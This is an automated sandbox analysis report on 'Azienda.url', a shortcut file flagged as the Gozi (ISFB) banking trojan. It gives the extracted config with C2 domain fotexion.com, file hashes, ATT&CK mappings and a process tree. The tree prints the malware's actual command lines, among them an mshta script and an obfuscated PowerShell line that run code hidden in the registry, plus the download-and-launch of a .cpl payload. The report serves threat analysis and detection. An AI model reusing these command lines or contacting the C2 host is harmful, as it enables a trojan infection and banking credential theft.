Overview

overview

10

Static

static

1

url/Ammini...ne.url

windows10-1703-x64

10

url/Ammini...ne.url

windows10-2004-x64

10

url/Azienda.url

windows10-1703-x64

10

url/Azienda.url

windows10-2004-x64

10

url/Cliente.url

windows10-1703-x64

10

url/Cliente.url

windows10-2004-x64

10

url/Documenti.url

windows10-1703-x64

10

url/Documenti.url

windows10-2004-x64

10

url/Informazioni.url

windows10-1703-x64

10

url/Informazioni.url

windows10-2004-x64

10

url/dettagli.url

windows10-1703-x64

10

url/dettagli.url

windows10-2004-x64

10

url/inform.url

windows10-1703-x64

10

url/inform.url

windows10-2004-x64

10

url/modulo.url

windows10-1703-x64

10

url/modulo.url

windows10-2004-x64

10

url/processo.url

windows10-1703-x64

10

url/processo.url

windows10-2004-x64

10

url/sistema.url

windows10-1703-x64

10

url/sistema.url

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-10-2023 01:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    url/Azienda.url

  • Size

    193B

  • MD5

    385b2d1cc0f48c9b113009619258b210

  • SHA1

    2a956120277957bf6b11ec05568e148cb1c0bc7c

  • SHA256

    589deb6665a90960cfbe3db62f3477f9a2087a2b2eb03d1a19ea69374a9eb34e

  • SHA512

    a82d7f78c72d8ba1849473a7ac2536e1c332289fbdf11c6ea6f5de6f182208871a4ccb59a0f5facccdd6d0c78e9c9e10dcfe4aa067426fe0ce69358477364e18

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3724
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4884
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3988
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3164
        • C:\Windows\System32\rundll32.exe
          "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\Azienda.url
          2⤵
          • Checks computer location settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Windows\System32\control.exe
            "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl",
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2284
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl",
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4588
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl",
                5⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:2532
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Uveb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Uveb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2560
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jyaaklsou -value gp; new-alias -name pqehsvxs -value iex; pqehsvxs ([System.Text.Encoding]::ASCII.GetString((jyaaklsou "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1752
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x5jh0w0a\x5jh0w0a.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4792
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA41B.tmp" "c:\Users\Admin\AppData\Local\Temp\x5jh0w0a\CSC3876A45D98864C6A9CB8B14BCB31DA96.TMP"
                5⤵
                  PID:3476
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\anxev31u\anxev31u.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1620
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA592.tmp" "c:\Users\Admin\AppData\Local\Temp\anxev31u\CSC5767DF6D266642D595543E499FD4486F.TMP"
                  5⤵
                    PID:4460
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4280
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:3712
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:2736
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:4936

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Initial Access

            Execution

            Persistence

            Privilege Escalation

            Defense Evasion

            Credential Access

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            2
            T1082

            Remote System Discovery

            1
            T1018

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Resource Development

            Reconnaissance

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl
              Filesize

              206KB

              MD5

              72e2a5c797954e895a41be5b20f867b2

              SHA1

              419aacfb3ccea9b08277bcc9405054fa4238a597

              SHA256

              858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

              SHA512

              77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl
              Filesize

              206KB

              MD5

              72e2a5c797954e895a41be5b20f867b2

              SHA1

              419aacfb3ccea9b08277bcc9405054fa4238a597

              SHA256

              858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

              SHA512

              77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\RESA41B.tmp
              Filesize

              1KB

              MD5

              29de298a6b4ad4c9bbcaa609c57c5c43

              SHA1

              285bed7f10aefeb433976b4a1f3e3c45aa20a01c

              SHA256

              8de35814f517e7426cf0daf8799ae1bc408d544fc85b35660deb434cfd32e2cb

              SHA512

              06c5e2d66bdbcb8765847df5bf030471d4b73c3e3bb41b662bd4601acf7e9dde1f9dc1f7659383f352ea7ed770d2762bf3deabb0a6f5cc83284fd48df263a0c7

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\RESA592.tmp
              Filesize

              1KB

              MD5

              f09b3adac936a2a2432aadbe168cdf2d

              SHA1

              615d8abe43c319b002ee7fa689f4ed98cd501e27

              SHA256

              bacb5580f74894bd8415d4bf1b27e027fcb3aa70d49edb5a79ee2077d99ebdd3

              SHA512

              20ea33303f62f7b3cb24edac273484d97892b5bd274e798ef6dd0692e0dd6a77f50024c6fd604890f60c08ec9f276847d111a6576a68e055bd7f1b8b6a03a2c6

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nrc5qasg.lnv.psm1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\anxev31u\anxev31u.dll
              Filesize

              3KB

              MD5

              82f86f11417b2c3d41003fdc3e7130ff

              SHA1

              6a38708b9b815762d2db442b52862149f5854dc1

              SHA256

              eb0cd4746d95151d90e1127f732bd90747aade929ded764660f987f18a8748ba

              SHA512

              467d8129542a364083706961f01461dd07161cd09fe0d101f12c5e18c6bd5c0e5aab8affa6476dc679bad3e59c9815129925e8532f92aeda835e9cf004961101

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\x5jh0w0a\x5jh0w0a.dll
              Filesize

              3KB

              MD5

              fe44543cdb0a2fdce97d2d4bdc650475

              SHA1

              65a96f2b07c96e716dc675d2aba4983a1e87c3ab

              SHA256

              a289efcac2993b3bb9cb55dedadb0ed225f269744d2dc913ffde6efcc40bb95d

              SHA512

              a9f61809a5eb107f18ef64fc02dea7c70989d49efca928fe1c1c76aa095b960f5f9d65f070358093ef44fdd866549c244b4838aa87742dd7b49f8a64ada4e233

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\anxev31u\CSC5767DF6D266642D595543E499FD4486F.TMP
              Filesize

              652B

              MD5

              46914143bf4b098ad8889930d7426ca4

              SHA1

              dd0976db01434caaa4e80318b228d9da8179b436

              SHA256

              df26e68c942f7f22a8d58c184b064b09ec7c3543a2d8eb96f623c410f5b81f0b

              SHA512

              572bdd238dbef331685f1db91ce0b4f6dfc12aec7b2bb04efdc018fef89e59c0a8374973fcb63844c3b350400861ad2deb374b9a44e3e7fd580c218d72366543

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\anxev31u\anxev31u.0.cs
              Filesize

              406B

              MD5

              ca8887eacd573690830f71efaf282712

              SHA1

              0acd4f49fc8cf6372950792402ec3aeb68569ef8

              SHA256

              568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

              SHA512

              2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\anxev31u\anxev31u.cmdline
              Filesize

              369B

              MD5

              8d9bccec47a7e8c57a79ee36508fdaf7

              SHA1

              98c1a5d7bf929c161d8ecf8130c7c53261d4b9b7

              SHA256

              a0cb3633fc586bafb4d3bf28950cd0fc6e22e372aedc59c35e1d83bc6fc1b5a1

              SHA512

              d59bf7405ea07f0a03a0910c1fa76ca19eef78dbbba91aa16a6577fc21e79de1de5922361394bb20e49ff0b3d83774b4c27f31dc44f834bf867b020b0ea759bf

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\x5jh0w0a\CSC3876A45D98864C6A9CB8B14BCB31DA96.TMP
              Filesize

              652B

              MD5

              d991a587e22eb7c9424c06bf6a31f792

              SHA1

              73e2c7ff869b317c97e6bfb1d570dd90e436bb40

              SHA256

              73579370f348fbef9ea46f38e34c0d8eef4c7e92451848b4e210fc5067816b25

              SHA512

              434b1119bc9fa3b0f3cad628a0cc4e94ae26d67818de1e2b8c4c13241bedd2e5758b33e157ad9b67faaee56db328bb306cfb214140ac7365370728413caa34ea

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\x5jh0w0a\x5jh0w0a.0.cs
              Filesize

              405B

              MD5

              caed0b2e2cebaecd1db50994e0c15272

              SHA1

              5dfac9382598e0ad2e700de4f833de155c9c65fa

              SHA256

              21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

              SHA512

              86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\x5jh0w0a\x5jh0w0a.cmdline
              Filesize

              369B

              MD5

              73f7bac29758f98abcf0516654a7a7f0

              SHA1

              7e471d40655927a637c1401382a9bb11498e1570

              SHA256

              bc8b995a2b422f62e503e1bd41a8908138774d10d04577632cc4824bbda1b574

              SHA512

              c4aac8b6274d8f26e6e0ff2c7981f730349a7f08d9aeecaa11ac1b1e2c48451a847f0b9e451f746a366af5928e9c0fc20a511fb6add57da8be43dc0d8f265fa3

              Download Submit
            • memory/1752-25-0x0000017B81520000-0x0000017B81530000-memory.dmp
              Filesize

              64KB

              Download
            • memory/1752-69-0x0000017B99D20000-0x0000017B99D5D000-memory.dmp
              Filesize

              244KB

              Download
            • memory/1752-68-0x00007FFEEF340000-0x00007FFEEFE01000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/1752-55-0x0000017B99D20000-0x0000017B99D5D000-memory.dmp
              Filesize

              244KB

              Download
            • memory/1752-39-0x0000017B99CF0000-0x0000017B99CF8000-memory.dmp
              Filesize

              32KB

              Download
            • memory/1752-24-0x00007FFEEF340000-0x00007FFEEFE01000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/1752-19-0x0000017BFFF70000-0x0000017BFFF92000-memory.dmp
              Filesize

              136KB

              Download
            • memory/1752-26-0x0000017B81520000-0x0000017B81530000-memory.dmp
              Filesize

              64KB

              Download
            • memory/1752-53-0x0000017B99D10000-0x0000017B99D18000-memory.dmp
              Filesize

              32KB

              Download
            • memory/2532-7-0x0000000002CA0000-0x0000000002CAE000-memory.dmp
              Filesize

              56KB

              Download
            • memory/2532-12-0x0000000002CA0000-0x0000000002CAE000-memory.dmp
              Filesize

              56KB

              Download
            • memory/2532-11-0x0000000002C60000-0x0000000002C89000-memory.dmp
              Filesize

              164KB

              Download
            • memory/2532-113-0x0000000002CA0000-0x0000000002CAE000-memory.dmp
              Filesize

              56KB

              Download
            • memory/2532-6-0x0000000002C60000-0x0000000002C89000-memory.dmp
              Filesize

              164KB

              Download
            • memory/2532-8-0x0000000002D00000-0x0000000002D0D000-memory.dmp
              Filesize

              52KB

              Download
            • memory/2736-105-0x00000000001F0000-0x00000000001F1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2736-112-0x0000000000A90000-0x0000000000B28000-memory.dmp
              Filesize

              608KB

              Download
            • memory/2736-101-0x0000000000A90000-0x0000000000B28000-memory.dmp
              Filesize

              608KB

              Download
            • memory/3164-58-0x0000000002710000-0x0000000002711000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3164-57-0x00000000083A0000-0x0000000008444000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3164-102-0x00000000083A0000-0x0000000008444000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3712-116-0x0000021C8C510000-0x0000021C8C5B4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3712-109-0x0000021C8C370000-0x0000021C8C371000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3712-106-0x0000021C8C510000-0x0000021C8C5B4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3724-114-0x000001FC5EB50000-0x000001FC5EBF4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3724-71-0x000001FC5EB50000-0x000001FC5EBF4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3724-72-0x000001FC5EC00000-0x000001FC5EC01000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3988-115-0x000001D978FD0000-0x000001D979074000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3988-77-0x000001D978FD0000-0x000001D979074000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3988-78-0x000001D978F90000-0x000001D978F91000-memory.dmp
              Filesize

              4KB

              Download
            • memory/4280-84-0x00000262A6F00000-0x00000262A6F01000-memory.dmp
              Filesize

              4KB

              Download
            • memory/4280-81-0x00000262A7010000-0x00000262A70B4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/4280-117-0x00000262A7010000-0x00000262A70B4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/4884-88-0x000001C86A870000-0x000001C86A871000-memory.dmp
              Filesize

              4KB

              Download
            • memory/4884-85-0x000001C86AA90000-0x000001C86AB34000-memory.dmp
              Filesize

              656KB

              Download
            • memory/4884-118-0x000001C86AA90000-0x000001C86AB34000-memory.dmp
              Filesize

              656KB

              Download
            • memory/4936-94-0x0000021F5E000000-0x0000021F5E0A4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/4936-96-0x0000021F5DD60000-0x0000021F5DD61000-memory.dmp
              Filesize

              4KB

              Download
            • memory/4936-119-0x0000021F5E000000-0x0000021F5E0A4000-memory.dmp
              Filesize

              656KB

              Download